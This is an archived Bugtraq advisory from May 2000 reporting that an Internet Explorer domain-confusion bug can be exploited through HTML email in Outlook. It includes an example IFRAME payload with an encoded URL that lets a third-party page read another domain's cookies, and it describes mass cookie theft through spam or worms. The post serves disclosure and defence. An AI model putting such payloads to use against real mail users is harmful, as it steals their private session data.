[14883] in bugtraq
IE Domain Confusion Vulnerability is an Email problem also
daemon@ATHENA.MIT.EDU (Richard M. Smith)
Fri May 12 12:46:34 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <NDBBKGHPMKBKDDGLDEEHAEHMDIAA.rms2000@bellatlantic.net>
Date: Fri, 12 May 2000 08:33:48 -0400
Reply-To: "Richard M. Smith" <rms2000@BELLATLANTIC.NET>
From: "Richard M. Smith" <rms2000@BELLATLANTIC.NET>
X-To: aleph1@SECURITYFOCUS.COM, BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20000511135609.D7774@securityfocus.com>
Hi,
This same IE bug can also be exploited from an HTML Email
message in Outlook and Outlook Express. The trick is
to put the magic URL in an HTML IFRAME tag. Example:
<iframe
src="http://www.peacefire.org%2fsecurity%2fiecookies%2f
showcookie.html%3f.yahoo.com/">
</iframe>
A malicious Email message could include many IFRAMEs
to grab cookies from different domains. The cookies
are stolen when the message is read.
Using an Email message, an attack can be directed
at a particular person or a group of people without
them every going to a Web site. The exploit could
also be included in a spam Email message or in the
payload of an Email worm/virus.
I suspect that the same trick works in newsgroup messages,
but I haven't had the time to run the experiment.
This is a pretty bad bug. People's private data at
Web sites is at risk here.
Richard
==========================================
Richard M. Smith
Internet consultant
Email: rms2000@bellatlantic.net
http://www.tiac.net/users/smiths
==========================================
